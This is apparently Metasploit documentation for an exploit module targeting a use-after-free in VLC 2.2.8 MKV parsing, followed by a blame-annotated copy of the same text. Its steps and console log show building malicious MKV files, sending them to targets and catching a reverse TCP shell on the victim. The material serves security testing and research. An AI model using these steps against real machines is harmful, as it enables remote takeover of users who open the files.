documentation/modules/exploit/windows/fileformat/vlc_mkv.md

## Description

VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.

This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.

## Vulnerable Application

[VLC](https://get.videolan.org/vlc/) <= v2.2.8

## Verification Steps

- `./msfconsole -q`
- `use exploit/windows/fileformat/vlc_mkv`
- `run`
- Start handler
- Copy over mkv files to target hosts and open part1 in VLC
- Set a shell

## Scenarios

### Windows 10 x64 running VLC 2.2.8 (x64)

```
msf5 > use exploit/windows/fileformat/vlc_mkv
msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134 
lhost => 172.22.222.134
msf5 exploit(windows/fileformat/vlc_mkv) > run

[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv
[*] Created tjub-part1.mkv. Target should open this file
[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv
[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv
[*] Appending blocks to tjub-part1.mkv
[+] Successfully appended blocks to tjub-part1.mkv
msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444
[*] Payload handler running as background job 0.
msf5 exploit(windows/fileformat/vlc_mkv) > 
[*] Started reverse TCP handler on 172.22.222.134:4444 
[*] Sending stage (336 bytes) to 172.22.222.200
[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500
sessions -i 2
[*] Starting interaction with 2...

systeminfo
systeminfo

Host Name:                 DESKTOP-IPOGIJR
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.17134 N/A Build 17134
```
Add documentation 2018-10-10 12:23:52 -05:00			`## Description`

			`VideoLAN VLC <= v2.2.8 (32 and 64 bit) are vulnerable to a use-after-free vulnerability that exists in the parsing of MKV files.`

			`This module has been tested against 32 and 64 bit versions of VLC v2.2.8 on Windows 10 Pro x64.`

			`## Vulnerable Application`

			`[VLC](https://get.videolan.org/vlc/) <= v2.2.8`

			`## Verification Steps`

			- `./msfconsole -q`
			- `use exploit/windows/fileformat/vlc_mkv`
			- `run`
			`- Start handler`
			`- Copy over mkv files to target hosts and open part1 in VLC`
			`- Set a shell`

			`## Scenarios`

			`### Windows 10 x64 running VLC 2.2.8 (x64)`

			```
			`msf5 > use exploit/windows/fileformat/vlc_mkv`
			`msf5 exploit(windows/fileformat/vlc_mkv) > set lhost 172.22.222.134`
			`lhost => 172.22.222.134`
			`msf5 exploit(windows/fileformat/vlc_mkv) > run`

			`[+] tjub-part1.mkv stored at /home/msfdev/.msf4/local/tjub-part1.mkv`
			`[*] Created tjub-part1.mkv. Target should open this file`
			`[+] tjub-part2.mkv stored at /home/msfdev/.msf4/local/tjub-part2.mkv`
			`[*] Created tjub-part2.mkv. Put this file in the same directory as tjub-part1.mkv`
			`[*] Appending blocks to tjub-part1.mkv`
spelling fixes on docs 2023-10-10 14:46:18 -04:00			`[+] Successfully appended blocks to tjub-part1.mkv`
Add documentation 2018-10-10 12:23:52 -05:00			`msf5 exploit(windows/fileformat/vlc_mkv) > handler -p windows/x64/shell/reverse_tcp -H 172.22.222.134 -P 4444`
			`[*] Payload handler running as background job 0.`
			`msf5 exploit(windows/fileformat/vlc_mkv) >`
			`[*] Started reverse TCP handler on 172.22.222.134:4444`
			`[*] Sending stage (336 bytes) to 172.22.222.200`
			`[*] Command shell session 2 opened (172.22.222.134:4444 -> 172.22.222.200:49731) at 2018-10-10 12:08:58 -0500`
			`sessions -i 2`
			`[*] Starting interaction with 2...`

			`systeminfo`
			`systeminfo`

			`Host Name: DESKTOP-IPOGIJR`
			`OS Name: Microsoft Windows 10 Pro`
			`OS Version: 10.0.17134 N/A Build 17134`
			```